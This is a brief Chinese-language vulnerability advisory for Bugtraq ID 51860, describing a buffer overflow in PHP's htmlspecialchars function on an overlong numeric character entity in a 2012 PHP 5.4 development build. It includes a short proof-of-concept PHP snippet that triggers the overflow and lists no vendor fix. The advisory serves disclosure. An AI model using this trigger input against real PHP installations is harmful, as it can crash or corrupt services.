Bugtraq ID: 51860
PHP是一款流行的编程语言
由于循环只保证开始处40字节可用,超长实体可导致缓冲区溢出:
<?php
echo htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;',
ENT_QUOTES, 'UTF-8', false), "\n";
0
php 5.4SVN-2012-02-03 (SVN)
厂商解决方案
目前没有详细解决方案提供:
http://www.php.net/
暂无评论